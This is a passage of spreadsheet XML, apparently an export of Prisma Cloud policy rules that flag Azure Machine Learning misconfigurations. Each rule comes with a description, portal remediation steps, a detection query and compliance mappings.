          <t>azure</t>
        </is>
      </c>
      <c r="J2296" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2296" t="inlineStr">
        <is>
          <t>Azure Machine Learning compute instance with local authentication enabled</t>
        </is>
      </c>
      <c r="L2296" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2296" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2296" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2296" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2296" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2296" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R2296" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S2296" t="inlineStr"/>
      <c r="T2296" t="b">
        <v>0</v>
      </c>
      <c r="U2296" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2296" t="inlineStr">
        <is>
          <t>azure-machine-learning-compute</t>
        </is>
      </c>
      <c r="W2296" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning compute instances that are using local authentication.
Disabling local authentication improves security by mandating the use of Microsoft Entra ID for authentication. Local authentication can lead to security risks and unauthorized access. Using Microsoft Entra ID ensures a more secure and compliant authentication process.
As a security best practice, it is recommended to disable local authentication and use Microsoft Entra ID for authentication.</t>
        </is>
      </c>
      <c r="X2296" t="inlineStr">
        <is>
          <t>Note: Disabling local authentication on an existing Azure Machine Learning compute instance without deleting and recreating it is not supported. The recommended approach to secure your compute instance is to set it up without local authentication from the beginning.
To create a new compute instance without local authentication:
1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the Azure Machine Learning Workspace that the reported compute instance is associated with
4. On the 'Overview' page, click the 'Studio web URL' link to log in to Azure ML Studio
5. A new tab will open for Azure ML Studio
6. In the left panel, under 'Manage' section, click on the 'Compute'
7. Click 'New' to create a new compute instance
8. In the 'Security' tab, under the 'Enable SSH access' section, leave the option disabled to turn off local authentication
9. Select 'Review + Create' to create the compute instance</t>
        </is>
      </c>
      <c r="Y2296" t="inlineStr"/>
      <c r="Z2296" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-machine-learning-compute' AND json.rule = properties.properties.state equal ignore case running and (properties.computeType equal ignore case ComputeInstance or properties.computeType equal ignore case AmlCompute ) and properties.disableLocalAuth is false</t>
        </is>
      </c>
      <c r="AA2296" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2296" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2296" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1295</t>
        </is>
      </c>
      <c r="AD2296" t="b">
        <v>1</v>
      </c>
      <c r="AE2296" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2296" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>b3a4acdc-2665-45f6-afd5-90e173fbb39c</t>
        </is>
      </c>
      <c r="AI2296" t="inlineStr">
        <is>
          <t>c3c4e49e-8652-46be-92f3-1fd4afdf8c06</t>
        </is>
      </c>
      <c r="AJ2296" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2296" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B2297" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2297" s="2" t="inlineStr"/>
      <c r="D2297" t="inlineStr"/>
      <c r="E2297" t="inlineStr"/>
      <c r="F2297" t="inlineStr"/>
      <c r="G2297" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2297" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2297" t="inlineStr">
        <is>
          <t>Azure Machine learning compute instance configured with public IP</t>
        </is>
      </c>
      <c r="L2297" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2297" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2297" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2297" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2297" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2297" t="inlineStr">
        <is>
          <t>500.2</t>
        </is>
      </c>
      <c r="R2297" t="inlineStr">
        <is>
          <t>500.02 (b) (2)</t>
        </is>
      </c>
      <c r="S2297" t="inlineStr"/>
      <c r="T2297" t="b">
        <v>0</v>
      </c>
      <c r="U2297" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2297" t="inlineStr">
        <is>
          <t>azure-machine-learning-compute</t>
        </is>
      </c>
      <c r="W2297" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning compute instances which are configured with public IP.
Configuring an Azure Machine Learning compute instance with a public IP exposes it to significant security risks, including unauthorized access and cyber-attacks. This setup increases the likelihood of data breaches, where sensitive information and intellectual property could be accessed by unauthorized individuals, leading to potential data leakage and loss.
As a best practice, it is recommended not to configure Azure Machine Learning instances with public IP.</t>
        </is>
      </c>
      <c r="X2297" t="inlineStr">
        <is>
          <t>Note: Disabling a public IP address on an existing Azure Machine Learning compute instance is not supported without deleting and recreating the instance. To secure your instance, it’s recommended to configure it without a public IP from the start. Additionally, to update an existing Azure Machine Learning workspace to use a managed virtual network, all compute resources (including compute instances, compute clusters, and managed online endpoints) must first be deleted.
To create a new compute instance with no public IP:
1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the Azure Machine Learning Workspace that the reported compute instance is associated with
4. Under 'Settings' go to 'Networking' section
5. At the top, select the 'Workspace managed outbound access' tab
6. Select either 'Allow Internet Outbound' or 'Allow Only Approved Outbound' based on your requirements, if one hasn't been chosen already
7. Click on 'Save'
8. On the 'Overview' page, click the 'Studio web URL' link to log in to Azure ML Studio
9. A new tab will open for Azure ML Studio
10. In the left panel, under 'Manage' section, click on the 'Compute'
11. Click 'New' to create a new compute instance
12. In the 'Security' tab, under the 'Virtual network' section, enable the 'No public IP' option to disable the public IP
13. Select 'Review + Create' to create the compute instance</t>
        </is>
      </c>
      <c r="Y2297" t="inlineStr"/>
      <c r="Z2297" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-compute' AND json.rule = properties.provisioningState equal ignore case Succeeded AND properties.properties.connectivityEndpoints.publicIpAddress exists AND properties.properties.connectivityEndpoints.publicIpAddress does not equal ignore case "null"</t>
        </is>
      </c>
      <c r="AA2297" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2297" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2297" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1259</t>
        </is>
      </c>
      <c r="AD2297" t="b">
        <v>1</v>
      </c>
      <c r="AE2297" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2297" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>68bace49-3764-4b89-bf26-493510ecbbd6</t>
        </is>
      </c>
      <c r="AI2297" t="inlineStr">
        <is>
          <t>38945f6f-394d-4547-a8b4-e8cf3f5c5b8f</t>
        </is>
      </c>
      <c r="AJ2297" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2297" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" t="inlineStr"/>
      <c r="B2298" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2298" s="2" t="inlineStr"/>
      <c r="D2298" t="inlineStr"/>
      <c r="E2298" t="inlineStr"/>
      <c r="F2298" t="inlineStr"/>
      <c r="G2298" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2298" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2298" t="inlineStr">
        <is>
          <t>Azure Machine Learning workspace Storage account Datastore using Account key based authentication</t>
        </is>
      </c>
      <c r="L2298" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2298" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2298" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2298" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2298" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2298" t="inlineStr"/>
      <c r="R2298" t="inlineStr"/>
      <c r="S2298" t="inlineStr"/>
      <c r="T2298" t="b">
        <v>0</v>
      </c>
      <c r="U2298" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2298" t="inlineStr">
        <is>
          <t>azure-machine-learning-datastores</t>
        </is>
      </c>
      <c r="W2298" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning workspace datastores that use storage account keys for authentication.
Account key-based authentication is a security risk because it grants full, unrestricted access to the storage account, including the ability to read, write, and delete all data. If compromised, attackers can control all data in the account. This method lacks permission granularity and time limits, increasing the risk of exposing sensitive information. Using SAS tokens provides more granular control, allowing you to limit access to specific resources and set time-bound access, which enhances security and reduces risks in production environments.
As a security best practice, it is recommended to use SAS tokens for authenticating Azure Machine Learning datastores.</t>
        </is>
      </c>
      <c r="X2298" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the Azure Machine Learning Workspace that the reported Datastore is associated with
4. On the 'Overview' page, click the 'Studio web URL' link to log in to Azure ML Studio
5. A new tab will open for Azure ML Studio
6. In the left panel, under 'Assets' section, click on the 'Data'
7. Select the 'Datastores' tab at the top
8. Click on the reported Datastore
9. Click on the 'Update authentication' tab at the top
9. A side panel will appear on the right, configure the 'Authentication type' as 'SAS token' and enter the token value
10. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2298" t="inlineStr"/>
      <c r="Z2298" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-machine-learning-datastores' AND json.rule = (properties.datastoreType equal ignore case AzureFile or properties.datastoreType equal ignore case AzureBlob) and properties.credentials.credentialsType equal ignore case AccountKey</t>
        </is>
      </c>
      <c r="AA2298" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2298" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2298" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1307</t>
        </is>
      </c>
      <c r="AD2298" t="b">
        <v>1</v>
      </c>
      <c r="AE2298" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2298" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>dabf9de7-d2ec-4d5e-96d8-ebf8a5879c69</t>
        </is>
      </c>
      <c r="AI2298" t="inlineStr">
        <is>
          <t>2e0b6293-9293-41ce-959e-4005521caf26</t>
        </is>
      </c>
      <c r="AJ2298" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2298" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2299" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2299" s="2" t="inlineStr"/>
      <c r="D2299" t="inlineStr"/>
      <c r="E2299" t="inlineStr"/>
      <c r="F2299" t="inlineStr"/>
      <c r="G2299" t="b">
        <v>1</v>
      </c>
      <c r="H22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299" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2299" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2299" t="inlineStr">
        <is>
          <t>Azure Machine Learning workspace not encrypted with Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L2299" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2299" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2299" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2299" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2299" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2299" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2299" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2299" t="inlineStr"/>
      <c r="T2299" t="b">
        <v>0</v>
      </c>
      <c r="U2299" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2299" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2299" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning workspaces that are not encrypted with a Customer Managed Key (CMK).
Azure handles encryption using platform-managed keys by default, but customer-managed keys (CMKs) provide greater control and help meet specific security and compliance requirements. Without CMKs, organizations may not have full control over key management and rotation, increasing the risk of compliance issues and unauthorized data access. Configuring the workspace to use CMKs enhances security by allowing organizations to manage key access and rotation, ensuring stronger protection and compliance for sensitive data.
As a security best practice, it is recommended to configure the workspace to use Customer Managed Keys (CMKs).</t>
        </is>
      </c>
      <c r="X2299" t="inlineStr">
        <is>
          <t>Note: Once a Azure Machine Learning workspace is deployed, you can't switch from Microsoft-managed keys to customer-managed keys. You'll need to delete and recreate the workspace with customer-managed keys enabled.
1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the reported Azure Machine Learning workspace
4. Delete the workspace and then recreate it, ensuring you enable 'Encrypt data using a customer-managed key' under the 'Encryption' tab</t>
        </is>
      </c>
      <c r="Y2299" t="inlineStr"/>
      <c r="Z2299" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and (properties.encryption.status does not exist or properties.encryption.status equal ignore case disabled)</t>
        </is>
      </c>
      <c r="AA2299" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2299" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2299" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1296</t>
        </is>
      </c>
      <c r="AD2299" t="b">
        <v>1</v>
      </c>
      <c r="AE2299" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2299" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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299" t="inlineStr">
        <is>
          <t>3dc779f5-d61a-4ac7-a6fe-5eb16953f910</t>
        </is>
      </c>
      <c r="AI2299" t="inlineStr">
        <is>
          <t>80ccee79-a53e-4445-9b7f-d102e44beef3</t>
        </is>
      </c>
      <c r="AJ2299" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2299" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HIPAA, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2300" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2300" s="2" t="inlineStr"/>
      <c r="D2300" t="inlineStr"/>
      <c r="E2300" t="inlineStr"/>
      <c r="F2300" t="inlineStr"/>
      <c r="G2300" t="b">
        <v>0</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2300" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2300" t="inlineStr">
        <is>
          <t>Azure Machine learning workspace configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2300" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2300" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2300" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2300" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2300" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2300" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2300" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2300" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2300" t="b">
        <v>0</v>
      </c>
      <c r="U2300" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2300" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2300" t="inlineStr">
        <is>
          <t>This policy identifies Machine learning workspaces configured with overly permissive network access. Overly permissive public network access allows access to resource through the internet using a public IP address. It is recommended to restrict IP ranges to allow access to your workspace and endpoint from specific public internet IP address ranges and is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2300" t="inlineStr">
        <is>
          <t>To restrict internet IP ranges on your existing Machine learning workspace, follow the below URL:
https://learn.microsoft.com/en-us/azure/machine-learning/how-to-configure-private-link?view=azureml-api-2&amp;tabs=azure-portal#enable-public-access-only-from-internet-ip-ranges-preview 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-49
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-49</t>
        </is>
      </c>
      <c r="Y2300" t="inlineStr"/>
      <c r="Z2300" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.publicNetworkAccess equal ignore case Enabled and (properties.ipAllowlist does not exist or properties.ipAllowlist is empty)
{"category":"Networking","resourceTypes":["azurerm_machine_learning_workspace"]}</t>
        </is>
      </c>
      <c r="AA2300" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2300" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:59</t>
        </is>
      </c>
      <c r="AC2300" t="inlineStr">
        <is>
          <t>PC-AZR-AML-848-CKV2_AZURE_49</t>
        </is>
      </c>
      <c r="AD2300" t="b">
        <v>1</v>
      </c>
      <c r="AE2300" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2300" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>76b345ae-d738-4485-8cfc-ed0c265ea016</t>
        </is>
      </c>
      <c r="AI2300" t="inlineStr">
        <is>
          <t>73f6928e-f03e-42a7-8bbf-348a0c029f63</t>
        </is>
      </c>
      <c r="AJ2300" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2300" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" t="inlineStr"/>
      <c r="B2301" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2301" s="2" t="inlineStr"/>
      <c r="D2301" t="inlineStr"/>
      <c r="E2301" t="inlineStr"/>
      <c r="F2301" t="inlineStr"/>
      <c r="G2301" t="b">
        <v>1</v>
      </c>
      <c r="H23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01" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2301" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2301" t="inlineStr">
        <is>
          <t>Azure Machine Learning workspace not configured with user-assigned managed identity</t>
        </is>
      </c>
      <c r="L2301" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2301" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2301" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2301" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2301" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2301" t="inlineStr"/>
      <c r="R2301" t="inlineStr"/>
      <c r="S2301" t="inlineStr"/>
      <c r="T2301" t="b">
        <v>0</v>
      </c>
      <c r="U2301" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2301" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2301" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning workspaces that are not configured with a user-assigned managed identity.
By default, Azure Machine Learning workspaces use system-assigned managed identities to access resources like Azure Container Registry, Key Vault, Storage, and Application Insights. However, user-assigned managed identities offer better control over the identity's lifecycle and consistent access management across multiple resources. Since system-assigned identities are tied to the workspace and deleted if the workspace is removed, using a user-assigned identity allows access management independently, enhancing security and compliance.
As a security best practice, it is recommended to configure the Azure Machine Learning workspace with a user-assigned managed identity.</t>
        </is>
      </c>
      <c r="X2301" t="inlineStr">
        <is>
          <t>Method 1: Updating an Existing Workspace
1. Once an Azure Machine Learning workspace is created with a System-Managed Identity, you cannot change it to use only a User-Assigned Managed Identity. You can update the workspace to use both System-Managed and User-Assigned Managed Identities.
2. For detailed instructions on how to configure this, visit the following URL: https://learn.microsoft.com/en-us/azure/machine-learning/how-to-identity-based-service-authentication?view=azureml-api-2&amp;tabs=cli#add-a-user-assigned-managed-identity-to-a-workspace-in-addition-to-a-system-assigned-identity
or
Method 2: Deleting the Existing Workspace and Creating a New Workspace
1. To use only a User-Assigned Managed Identity, delete the existing workspace.  
2. Create a new Azure Machine Learning workspace. During the setup, select 'User Assigned Identity' under the 'Identity' tab to ensure it exclusively uses a User-Assigned Managed Identity from the start.</t>
        </is>
      </c>
      <c r="Y2301" t="inlineStr"/>
      <c r="Z2301" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and identity.type does not contain UserAssigned</t>
        </is>
      </c>
      <c r="AA2301" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2301" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2301" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1306</t>
        </is>
      </c>
      <c r="AD2301" t="b">
        <v>1</v>
      </c>
      <c r="AE2301" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2301" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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01" t="inlineStr">
        <is>
          <t>b25c6490-4a5f-4589-92d4-15a0e86ef87f</t>
        </is>
      </c>
      <c r="AI2301" t="inlineStr">
        <is>
          <t>ac62a964-b850-48e7-89b8-972fa8a36ac3</t>
        </is>
      </c>
      <c r="AJ2301" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2301" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2302">
      <c r="A2302" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B2302" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2302" s="2" t="inlineStr"/>
      <c r="D2302" t="inlineStr"/>
      <c r="E2302" t="inlineStr"/>
      <c r="F2302" t="inlineStr"/>
      <c r="G2302" t="b">
        <v>1</v>
      </c>
      <c r="H23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02" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2302" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2302" t="inlineStr">
        <is>
          <t>Azure Machine Learning workspace not enforced with Managed Virtual Network Isolation</t>
        </is>
      </c>
      <c r="L2302" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2302" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2302" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2302" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2302" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2302" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R2302" t="inlineStr">
        <is>
          <t>Network Security</t>
        </is>
      </c>
      <c r="S2302" t="inlineStr"/>
      <c r="T2302" t="b">
        <v>0</v>
      </c>
      <c r="U2302" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2302" t="inlineStr">
        <is>
          <t>azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W2302" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning workspaces that are not enforced with Managed Virtual Network Isolation.
Managed Virtual Network Isolation ensures that the workspace and its resources are accessible only within a secure virtual network. Without enforcing this isolation, the environment becomes vulnerable to security risks like external threats, data leaks, and non-compliance. If not properly isolated, the workspace may be exposed to public networks, increasing the chances of unauthorized access and data breaches.
As a security best practice, it is recommended to configure Azure Machine Learning workspaces with Managed Virtual Network Isolation. This will restrict network access to the workspace and ensure that it can only be accessed from authorized networks.</t>
        </is>
      </c>
      <c r="X2302" t="inlineStr">
        <is>
          <t>Note: To update an existing Azure Machine Learning workspace to use a managed virtual network, you first need to delete all its compute resources, including compute instances, compute clusters, and managed online endpoints.
1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the reported Azure Machine Learning Workspace
4. Under 'Settings' go to 'Networking' section
5. At the top, select the 'Workspace managed outbound access' tab
6. Choose either 'Allow Internet Outbound' or 'Allow Only Approved Outbound' based on your needs
7. Configure the workspace outbound rules according to your requirements
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2302" t="inlineStr"/>
      <c r="Z2302" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-machine-learning-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded and (properties.managedNetwork.isolationMode equal ignore case Disabled OR properties.managedNetwork.isolationMode does not exist)</t>
        </is>
      </c>
      <c r="AA2302" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2302" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2302" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1297</t>
        </is>
      </c>
      <c r="AD2302" t="b">
        <v>1</v>
      </c>
      <c r="AE2302" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2302" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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02" t="inlineStr">
        <is>
          <t>51ffe18c-0932-4573-aabd-eed0b271a13f</t>
        </is>
      </c>
      <c r="AI2302" t="inlineStr">
        <is>
          <t>829744b8-dc58-432d-8763-7e65d0357a64</t>
        </is>
      </c>
      <c r="AJ2302" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2302" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2303">
      <c r="A2303" t="inlineStr">
        <is>
